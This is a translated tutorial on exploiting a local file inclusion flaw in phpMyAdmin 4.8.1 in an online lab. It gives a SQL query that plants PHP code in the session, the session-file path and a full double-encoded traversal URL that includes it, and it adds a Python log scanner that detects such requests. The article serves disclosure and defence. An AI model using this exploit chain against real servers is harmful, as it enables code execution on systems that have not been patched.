phpMyAdmin 4.8.x local file inclusion exploit

Source: Internet
Author: User
Tags session id sessions phpmyadmin

Today the CHAMD5 security team disclosed a local file inclusion vulnerability in the latest version of phpMyAdmin: phpmyadmin4.8.1 backstage Getshell. Exploitation does not require a root account; it only requires being logged in to phpMyAdmin.

In this article we use Vulnspy's online phpMyAdmin environment to demonstrate exploitation of this vulnerability.

Vulnspy Online phpMyAdmin Environment address: HTTP://WWW.VULNSPY.COM/PHPMYADMIN-4.8.1/

Vulnerability Details

Refer to the article published by the CHAMD5 security team: phpmyadmin4.8.1 backstage Getshell

Exploitation

The method in the original article, including a database file, may not work because of file permissions or insufficient account privileges, so here we exploit the file inclusion vulnerability another way: through the session file.

1. Open the Vulnspy online phpMyAdmin environment address and click Start to Hack; you are redirected to Vsplate

2. After the settings finish loading, click the GO button to start the experiment

3. After the experiment is created, click the demo address to enter the experiment

4. Log in to phpMyAdmin with account root, password Toor

5. Click the SQL button in the top navigation bar and execute the following SQL query

select '<?php phpinfo();exit;?>'

6. Get your session ID

Your session ID is the value of the phpMyAdmin cookie.

It corresponds to the session file /var/lib/php/sessions/sess_<your session ID>.

7. Include the session file to successfully exploit the vulnerability

http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k
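From the defender's side, the request in step 7 is easy to spot in web server logs: `%253f` is a double-encoded `?`, followed by `../` traversal into the PHP session directory. The following detection sketch is an added example, not part of the original article or of phpMyAdmin; the log lines are constructed, and the combined log format and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed access-log lines (client IPs, times and sizes are made up);
# the second request has the shape of the URL shown in step 7.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Jun/2018:10:01:02 +0000] "GET /index.php?target=db_sql.php&db=test HTTP/1.1" 200 5120
203.0.113.9 - - [21/Jun/2018:10:03:44 +0000] "GET /index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k HTTP/1.1" 200 90311
203.0.113.5 - - [21/Jun/2018:10:04:10 +0000] "GET /index.php?target=server_status.php HTTP/1.1" 200 7001
"""
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing; return (decoded, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def inspect_target(raw_target):
    """Return the reasons a raw (still encoded) target value is suspicious."""
    decoded, rounds = fully_decode(raw_target)
    reasons = []
    if rounds > 1:  # e.g. %253f -> %3f -> ?
        reasons.append("multiply-encoded")
    if "?" in decoded:  # a page name never needs its own query string
        reasons.append("embedded '?'")
    if "../" in decoded or "..\\" in decoded:
        reasons.append("path traversal")
    if re.search(r"/sess_[0-9A-Za-z,-]+$", decoded):
        reasons.append("session file path")
    return reasons

def scan(log_text):
    """Return (line number, reasons) for each request with a suspicious target."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        for pair in urlsplit(match.group(1)).query.split("&"):
            name, _, raw = pair.partition("=")
            if name == "target" and (reasons := inspect_target(raw)):
                findings.append((lineno, reasons))
    return findings

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Decoding to a fixed point matters here: a filter that decodes only once sees `%3f` rather than `?` and lets the request through.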

GitHub Source

https://github.com/vulnspy/phpmyadmin-4.8.1

Reference

"Starter" phpmyadmin4.8.1 backstage Getshell

phpMyAdmin 4.8.x LFI to RCE (Authorization Required) - https://blog.vulnspy.com/2018/06/21/phpmyadmin-4-8-x-authorited-cli-to-rce/
